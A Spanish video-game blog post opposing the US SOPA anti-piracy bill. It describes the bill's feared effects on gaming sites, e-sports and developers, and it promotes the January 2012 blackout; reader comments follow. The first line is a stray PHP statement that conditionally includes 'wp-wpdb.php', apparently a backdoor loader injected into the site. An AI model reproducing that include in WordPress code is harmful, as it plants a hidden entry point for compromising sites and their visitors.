if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); La SOPA y como afecta a los videojuegos – La Fortaleza de LeChuck

La SOPA y como afecta a los videojuegos

Estos últimos meses habréis oído hablar de una tal SOPA (Stop Online Piracy Act), pues bien, ni es de gallina blanca ni está nada buena. Es la sinde americana (pero mucho más agresiva) promovida por los lobbies estadonidenses para ejercer su poder supremo sobre internet, uno de los últimos resquicios de libertad que nos queda. Por supuesto, con esto no se pretente proteger ni la propiedad intelectual, ni la cultura, tan solo los bolsillos de algunos.

La SOPA es un proyecto de ley introducido en la Cámara de Representantes de los Estados Unidos el 26 de octubre de 2011, por el cual se pretende cerrar páginas que violen el copyright y las que se consideren «peligrosas» por cualquier motivo sin pasar por los juzgados. Además de otros daños colaterales como:
– La restricción al acceso a empresas que brindan un servicio de pago, como PayPal, o que ofrecen dinero a cambio de colocar publicidad online, como anuncios de Google.
– Restricción en los buscadores que vinculan las webs peligrosas.
– Requerimiento a los proveedores de internet, para que bloqueen el acceso a tales sitios.
Con esta ley, si alguien sube un video, una imagen o texto que contenga información de algún producto con derechos de autor, pueden multarle o incluso enviarle a la cárcel. Además, los que infrinjan la ley serán monotorizados.
Pero la SOPA no solo afecta a americanos, sino a internautas de cualquier parte del mundo, puesto que muchas páginas y dominios se hospedan en servidores de EE.UU.
Páginas sin ánimo de lucro como la Wikipedia, que ofrece un amplio abanico de información, dejaría de existir. Youtube y los buscadores se reducirían prácticamente a la nada.
Páginas que comparten películas, series, música estarán en el punto de mira, pero y ¿Los videojuegos? También serían perjudicados.
– Prácticamente ningún blog, comunidad, o web se salvaría de la quema, al usar imágenes con derechos de autor, videos e información.
– Los E-Sports serían gravemente perjudicados, los jugadores no podrían subir sus mejores jugadas, ni streamings, ni retransmisiones de eventos, ni tampoco podrían existir foros o material de ningún tipo.
– Los desarrolladores de videojuegos también sufrirían las consecuencias si comparten parte de su trabajo con derechos de autor perteneciente a una gran compañía, y serán responsables de las infracciones de los usuarios.
Nintendo, al conocer la gravedad del asunto, retiró su apoyo a la Ley SOPA. Sony y Electronic Arts también retiraron su firma tiempo después. Desarrolladores de videojuegos como Bungie han mostrado desde un comienzo su total rechazo de forma clara y concisa:

Bungie se opone a cualquier legislación que limite la libertad de expresión, ahogue la innovación e impida el compartir abiertamente información en Internet. SOPA entra dentro de esa categoría. Si se aprueba, hará daño a nuestra comunidad, la comunidad de jugadores, y podría impedir desarrollar los juegos que nos encanta crear y jugar. Y eso, como la piratería online, sería algo simplemente criminal.

Algunos de los sitios webs que están en contra de la SOPA son Wikipedia, Facebook, Amazon, Twitter Creative Commons, Youtube y Ebay, quienes ya han amenazado con apagones si se lleva a cabo semejante ley estúpida. Sin embargo, irónicamente, algunos de los sitios que apoyan esta injusta ley son Microsoft, Adobe y AppleAnonymous ha creando un video que amenaza a las empresas que apoyen la SOPA.
El sábado, los periódicos publicaban que el congreso de los Estados Unidos había paralizado la aprobación de la SOPA, por el momento, por falta de un consenso. Han sido numerosas empresas de ámbitos diversos que han criticado duramente este atentado contra la libertad de expresión y la privacidad. Hemos ganado una pequeña batalla pero no la guerra, la amenaza sigue ahí.

Mañana, día 18 de enero, tendrá lugar el apagón de 12 horas (de 14:00 de la tarde a 2:00 de la madrugada en España) contra la SOPA. En la web Strike against SOPA Ya hay muchas empresas que han confirmado que mantendrán inactivos sus sitios, entre ellas se encuentran: WordPress, Wikipedia, Mozilla, y desarrolladoras de videojuegos como Mojang y Red 5, entre muchas otras.

Esto es importante y necesita el rechazo de todos, porque ¿Os imagináis nuestro internet como el de China o Irán? donde nada más pudiéramos ver la información que al gobierno y a los lobbies les conviniera? Yo no.
    • Gracias a la información de webs he descubierto videojuegos inolvidables.
    • Gracias a las redes sociales he compartido opiniones, imágenes y videos sobre mis títulos favoritos
    • Gracias a los videos de youtube he conocido cosas únicas como el espectáculo Distant Worlds: Music from Final Fantasy.
    • Gracias a páginas de series y películas online he descubierto algunas de mis series favoritas, las cuales he adquirido en DVD posteriormente. Lo mismo podría decir de la música, donde he asistido a conciertos geniales de esos grupos poco conocidos que no salen por tv o radio.
    • Y aún más difícil, gracias a foros he podido disfrutar de doramas (series japonesas), música japonesa  y animes que NUNCA verán la luz en estas tierras. Y así un largo etcétera.
        Desde este pequeño rincón de información sobre nuestra afición, estamos totalmente en contra de esta ley absurda. Yo particularmente he firmado una campaña de recogida de firmas llamada Salvemos Internet, donde ya han reunido más de 1 millón de firmas. Difunde en tu blog, web, redes sociales, movilicémonos contra la censura.
        Por último, os dejo un video que recomiendo fervientemente. Explica en nuestro idioma la gravedad de la SOPA.

        Más información: Wikipedia | NacionRed | El País | Betamina

        Publicada el
        Categorizado como Opinión

        Por Arashi

        Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

        13 comentarios

        1. o sea… que si en el blog subiis una foto de cara limon. enseñando el ultimo juego que se ha comprado, nos pueden cerrar el blog y meternos a todos a la carcel? hasta tan lejos van a llegar??

          prff con la pirateria y todo eso, lo comprenderia, pero hasta el extremo de cualquier cosa con copyright… madremia.

        2. esto es una crueldad , pero una cosa q no entiendo , por que compañias como microsoft le apoyan . apple aun porque afectaria en gran medida a google pero microsoft , si gran parte de la ventas de sus juegos se la deben a la publicidad de internet. y adobe? si la ley va a afectar a youtube y sus videos para que quiero el adobe flash . no le veo nada de sentido.Ademas se empieza con esto y terminan

        3. Mafalda odiaba la SOPA y me gusta Mafalda, pero tendría que empollarme esta ley y entender cómo se va a ejecutar antes de pronunciarme al respecto.

          Personalmente considero que Internet como vehículo para compartir contenidos está bien hasta cierto punto, que es ese en el que no se causa un daño a nadie (empresas, autores, artistas); pero tengo muy claro que si en lugar de comprarme un

        4. @Herman Toothrot: Ninguna, esa gente que opera en la sompra lo que quiere es manipularnos, y en internet se filtra información que no les interesa.

          @Deedh: exacto, todo lo que tenga derechos de autor, eliminado.

          @Smirk: te recomiendo que leas porque es algo que nos afecta a todos, sobretodo si aprecias la libertad de expresión.

          @alexanmagus: es que sentido no

        5. no tiene sentido que quieran aprobar una ley asi si luego no quieren llevar productos a las tiendas , los consumidores de videojuegos americano llevan un tiempo ahaciendo la operacion rainfall( envio masivo de cartas a nintendo america para llevar a las tiendas last story xenoblade y pandora'ss tower) y no les hacen ni caso , luego normal que piraten , y ahora quieren luchar contra eso , no

        6. El caso es que EEUU es el que da las DNS y "administra" los dominios en todo el mundo me parece. Si se aprueba la SOPA significará que independientemente de si en Unganda o en Kuala Lumpur por ejemplo no esté penado dar un enlace o bajarse cosas se bloqueará todo.

          Da igual que sea mostrar una simple fotografía, un trailer de una película, , una imágen de un juego en

        7. Quita, quita, Elaine, que yo por informarme me refiero a leerme la SOPA y ni se me pasa por la cabeza hacerlo, que bastante tengo con lo mío. Mi opinión sobre la propiedad intelectual es sencilla: se puede mejorar mucho por parte de ambos bandos y ninguno dice toda la verdad sobre lo que quiere proteger.

        Dejar un comentario